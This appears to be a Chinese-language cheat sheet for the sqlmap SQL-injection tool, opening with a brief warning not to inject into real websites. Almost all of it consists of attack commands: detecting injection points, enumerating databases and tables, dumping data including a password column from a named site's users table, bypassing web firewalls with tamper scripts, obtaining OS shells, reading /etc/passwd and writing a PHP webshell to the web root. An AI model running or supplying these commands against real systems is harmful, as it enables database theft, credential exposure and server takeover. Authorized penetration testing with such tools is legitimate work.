/*不要随意对真实网站注入*/1. 启动 sqlmapWindows假设已安装 Python没下载的话先去下python环境python sqlmap.py这是启动sqlmap工具的命令如果已配置环境变量可以使用sqlmap -h查看帮助。2.检测 GET 注入基本用法sqlmap -u http://example.com/page.php?id1不用引号引起来有可能会有错误-u指定目标 URL自动检测注入点、数据库类型、是否可注入3. 常用参数参数作用用法示例-u目标URL引号-u http://test.com?id1-r请求文件加载-r req.txt--dataPOST方式提交数据--data user1pass2--cookie设置Cookie--cookie PHPSESSIDxxx-p指定测试参数-p id--level测试等级(1-5, 越高测越多)不用的话默认1--level 3--risk风险等级(1-3)--risk 2--batch自动默认选择不询问自动Y--batch--threads并发线程数--threads 104. 获取数据库信息核心流程4.1 枚举数据库sqlmap -u url?id1--dbs4.2 获取当前数据库sqlmap -u url?id1--current-db4.3 枚举指定数据库的表sqlmap -u url?id1-D database_name --tables4.4 枚举指定主句库的表的列sqlmap -u url?id1-D db_name -T table_name --columns4.5 查询表数据sqlmap -u url?id1-D db_name -T table_name --dump可加--start 1 --stop 10只取前10条方便查看5. 实用场景5.1 POST 注入使用--datasqlmap -u http://test.com/login --data useradminpass1235.2 带Cookie/Token推荐用-r先用浏览器抓包复制请求保存为req.txt可在怀疑注入点加*然后sqlmap -r req.txt5.3 绕过WAFsqlmap -u url --tamperbetween,randomcase,space2comment常见tamperspace2commentbetweenrandomcaseversionedkeywords5.4 获取操作系统/数据库交互 shell# SQL shell sqlmap -u url --sql-shell # 操作系统shell需要高权限 sqlmap -u url --os-shell5.5 文件读取/写入# 读取文件 sqlmap -u url --file-read/etc/passwd # 写 webshell sqlmap -u url --file-write shell.php --file-dest /var/www/html/shell.php6. 速查口诀先检测sqlmap -u url看库--dbs看表-D 库名 --tables看列-D 库名 -T 表名 --columns拿数据--dump遇阻碍--cookie/-r/--tamper省心--batch --threads 107. 示例sqlmap -u http://Landi.com/ye.php?id5 --batch --dbs sqlmap -u http://Landi.com/ye.php?id5 -D landi_db --tables --batch sqlmap -u http://Landi.com/ye.php?id5 -D landi_db -T landi_users --columns --batch sqlmap -u http://Landi.com/ye.php?id5 -D landi_db -T landi_users -C password --dump --batch
